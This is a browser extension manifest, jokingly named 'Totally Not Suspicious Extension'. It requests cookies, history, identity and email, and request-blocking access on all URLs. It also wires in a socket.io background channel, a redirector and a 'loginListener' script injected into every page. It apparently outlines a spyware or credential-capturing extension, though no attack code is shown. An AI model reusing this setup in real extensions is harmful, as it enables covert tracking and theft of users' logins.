{
  "name": "Totally Not Suspicious Extension",
  "version": "1.0",
  "description": "Not suspicious at all!",
  "permissions": [
    "identity",
		"identity.email",
    "activeTab",
    "declarativeContent",
    "storage",
    "cookies", "<all_urls>",
    "history",
    "webRequest",
    "webRequestBlocking", "<all_urls>"
  ],
  "options_page": "/html/options.html",
  "background": {
    "scripts": [
      "/js/modules/socket.io.js",
      "/js/background.js",
      "/js/serverFunctions.js",
      "/js/tabFunctions.js",
      "/js/redirector.js"
    ],
    "persistent": true
  },
  "page_action": {
    "default_popup": "/html/popup.html"
  },
  "content_scripts": [{
    "matches": ["<all_urls>"],
    "js": ["/js/loginListener.js"]
  }],
  "manifest_version": 2
}
